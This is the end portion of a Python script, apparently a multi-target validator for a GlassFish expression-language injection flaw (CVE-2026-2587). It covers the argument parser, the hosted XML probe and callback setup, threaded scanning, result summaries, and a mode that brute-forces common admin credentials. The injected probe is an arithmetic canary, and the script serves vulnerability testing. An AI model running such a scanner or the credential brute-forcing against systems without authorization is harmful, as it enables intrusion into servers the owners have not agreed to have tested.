verdict == "AUTH_REQUIRED": print(_warn(f"AUTH REQUIRED — {r.get('error','session rejected')}")) else: err = r.get("error", "") print(_warn(f"{verdict}" + (f" — {err}" if err else ""))) if verbose: for tc in r.get("tc_results", []): sym = "[+]" if tc["status"] == "VULNERABLE" else "[-]" if tc["status"] == "NOT_VULNERABLE" else "[?]" print(f" {sym} {tc['name']:30s} {tc['status']}") if verdict in ("VULNERABLE", "VULNERABLE_UNAUTH"): print() print(_inf("Remediation: restrict admin access and apply vendor-published fixed builds when available.")) def print_summary(results: list[dict]) -> None: total = len(results) vuln = sum(1 for r in results if "VULNERABLE" in r["verdict"]) noauth = sum(1 for r in results if r["verdict"] == "AUTH_REQUIRED") notvuln = sum(1 for r in results if r["verdict"] == "NOT_VULNERABLE") errors = total - vuln - noauth - notvuln print(f"\n{'═'*64}") print(f" SCAN SUMMARY — {total} target(s)") print(f"{'═'*64}") print(f" {G}Vulnerable : {vuln}{RESET}") print(f" Not vulnerable : {notvuln}") print(f" Auth required : {noauth}") print(f" Error / other : {errors}") print(f"{'═'*64}") # ══════════════════════════════════════════════════════════════════════════════ # ARGUMENT PARSER # ══════════════════════════════════════════════════════════════════════════════ def build_parser() -> argparse.ArgumentParser: p = argparse.ArgumentParser( description="CVE-2026-2587 GlassFish EL injection — multi-target validator", formatter_class=argparse.RawDescriptionHelpFormatter, ) # Targets — one of --base or --targets-file required (not required when --generate-xml used) tg = p.add_mutually_exclusive_group(required=False) tg.add_argument("--base", help="Single GlassFish admin URL e.g. https://localhost:4848") tg.add_argument("--targets-file", help="File with one target per line (URL [user] [pass])") p.add_argument("--path", action="append", help="Custom endpoint path (repeatable)") # XML delivery p.add_argument("--xml-url", help="Pre-hosted static XML URL (VPS/interactsh)") p.add_argument("--listen", help="Serve XML locally e.g. 0.0.0.0:8000") p.add_argument("--callback-url", help="URL target fetches for XML e.g. http://host.docker.internal:8000") # Canary customisation p.add_argument("--prefix", help="Canary prefix e.g. CVE2587") p.add_argument("--left", type=int, help="Left operand e.g. 7") p.add_argument("--right", type=int, help="Right operand e.g. 7") # Auth (global — overridden per-target by targets-file) auth = p.add_mutually_exclusive_group() auth.add_argument("--username", help="Admin username") auth.add_argument("--brute", action="store_true", help=f"Try {len(BRUTE_CREDS)} common GlassFish credential pairs " "(mutually exclusive with --username/--cookie)") p.add_argument("--password", help="Admin password (used with --username)") p.add_argument("--cookie", help='Session cookie e.g. "JSESSIONID=abc123"') # Network p.add_argument("--header", action="append", help='Extra header (repeatable) e.g. --header "X-Forwarded-For: 1.2.3.4"') p.add_argument("--proxy", help="HTTP proxy e.g. http://127.0.0.1:8080") p.add_argument("--timeout", type=int, default=15) p.add_argument("--insecure", action="store_true") p.add_argument("--threads", type=int, default=1, help="Parallel scan threads for multi-target mode (default 1)") # Output p.add_argument("--json", action="store_true", help="JSON to stdout") p.add_argument("--csv", metavar="FILE", help="CSV report path (use - for stdout)") p.add_argument("--verbose", action="store_true") # Mode p.add_argument("--check-unauth-only", action="store_true", help="Only test unauthenticated access then exit") # XML generation p.add_argument("--generate-xml", metavar="FILE", help="Generate a probe.xml and exit (use - for stdout) " "e.g. --generate-xml probe.xml") return p # ══════════════════════════════════════════════════════════════════════════════ # MAIN # ══════════════════════════════════════════════════════════════════════════════ def generate_xml(dest: str, prefix: str, left: int, right: int) -> None: """Write a ready-to-host probe XML to dest (or stdout if dest=='-').""" canary = Canary(prefix=prefix, left=left, right=right) content = canary.xml().decode() if dest == "-": print(content) else: with open(dest, "w", encoding="utf-8") as f: f.write(content) print(_ok(f"probe XML written → {dest}")) print(_inf(f" Expression : {canary.expr}")) print(_inf(f" Expects : {canary.title_eval} in response title")) print(_inf(f" Host this file at a URL reachable by the target server.")) print(_inf(f" Then run:")) print(_inf(f" --xml-url http://YOUR_SERVER/{dest}")) print(_inf(f" --prefix {prefix} --left {left} --right {right}")) def main(argv: Optional[list[str]] = None) -> int: args = build_parser().parse_args(argv) # ── --generate-xml: create probe file and exit, no target needed ───────── if args.generate_xml: prefix = args.prefix or "CVE2587" left = args.left if args.left is not None else 7 right = args.right if args.right is not None else 7 if not re.fullmatch(r"[A-Za-z0-9_-]{3,80}", prefix): print("--prefix: 3-80 alphanumeric/underscore/hyphen chars", file=sys.stderr) return 2 generate_xml(args.generate_xml, prefix, left, right) return 0 # target required for all other modes if not args.base and not args.targets_file: print("Provide --base or --targets-file (or use --generate-xml to create a probe XML)", file=sys.stderr) return 2 serve_mode = bool(args.listen) static_mode = bool(args.xml_url) if not serve_mode and not static_mode: print("Provide --listen + --callback-url OR --xml-url", file=sys.stderr) return 2 if serve_mode and not args.callback_url: print("--listen requires --callback-url", file=sys.stderr) return 2 verify = not args.insecure if args.insecure: warnings.simplefilter("ignore", InsecureRequestWarning) # Build target list if args.base: targets = [Target(base=args.base)] else: targets = load_targets_file(args.targets_file) if not targets: print("[!] No targets found.", file=sys.stderr); return 2 # Build canary prefix = args.prefix or (f"CVE20262587{random.randint(100000,999999)}" if serve_mode else "CVE2587") if not re.fullmatch(r"[A-Za-z0-9_-]{3,80}", prefix): print("--prefix: 3-80 alphanumeric/underscore/hyphen chars", file=sys.stderr) return 2 left = args.left if args.left is not None else (random.randint(13, 97) if serve_mode else 7) right = args.right if args.right is not None else (random.randint(101,199) if serve_mode else 7) canary = Canary(prefix=prefix, left=left, right=right) # Build test cases tag = random.randint(10000, 99999) test_cases = build_test_cases(tag) if serve_mode else [] tc_built = [] for tc in test_cases: xml_bytes, detect_token, raw_prefix = make_tc_xml(tc, tag) tc_built.append((tc, xml_bytes, detect_token, raw_prefix)) # Normalise callback to scheme://host:port — strip any filename the user # may have included (e.g. http://host:8000/cve.xml -> http://host:8000). callback_warning = None if args.callback_url: cb_base, callback_warning = normalize_callback_base(args.callback_url) else: cb_base = "" xml_url = (f"{cb_base}/canary.xml" if serve_mode else args.xml_url) if not args.json: print(f"\n{'═'*64}") print(f" CVE-2026-2587 · GlassFish EL Injection Validator") mode = f"{len(test_cases)} test cases" if serve_mode else "single canary" print(f" Mode: {mode} · Targets: {len(targets)} · Threads: {args.threads}") print(f"{'═'*64}") print(_inf(f"Callback : {xml_url}")) if callback_warning: print(_warn(callback_warning)) if args.proxy: print(_inf(f"Proxy : {args.proxy}")) print() print_lock = threading.Lock() @contextlib.contextmanager def _maybe_serve(): if serve_mode: with xml_server(args.listen, args.verbose): _State.routes["/canary.xml"] = canary.xml() _State.routes["/cve.xml"] = canary.xml() for tc, xml_bytes, _, _ in tc_built: _State.routes[tc.path] = xml_bytes time.sleep(0.25) yield else: yield all_results = [] with _maybe_serve(): def _worker(t: Target) -> dict: return scan_one( target=t, args=args, verify=verify, canary=canary, xml_url=xml_url, cb_base=cb_base, test_cases=test_cases, tc_built=tc_built, serve_mode=serve_mode, static_mode=static_mode, verbose=args.verbose, print_lock=print_lock, ) n_threads = max(1, min(args.threads, len(targets))) if n_threads == 1: for t in targets: r = _worker(t) all_results.append(r) if not args.json: print_result(r, args.verbose) else: future_map = {} with ThreadPoolExecutor(max_workers=n_threads) as pool: for t in targets: future_map[pool.submit(_worker, t)] = t for fut in as_completed(future_map): r = fut.result() all_results.append(r) if not args.json: print_result(r, args.verbose) # ── Output ──────────────────────────────────────────────────────────────── if not args.json: if len(all_results) > 1: print_summary(all_results) if args.json: print(json.dumps(all_results if len(all_results) > 1 else all_results[0], indent=2, sort_keys=True)) if args.csv: write_csv(all_results, args.csv) # Exit code: 0 if any target vulnerable, 1 if none, 3 if auth issues verdicts = {r["verdict"] for r in all_results} if any("VULNERABLE" in v for v in verdicts): return 0 if verdicts == {"AUTH_REQUIRED"}: return 3 return 1 if __name__ == "__main__": sys.exit(main())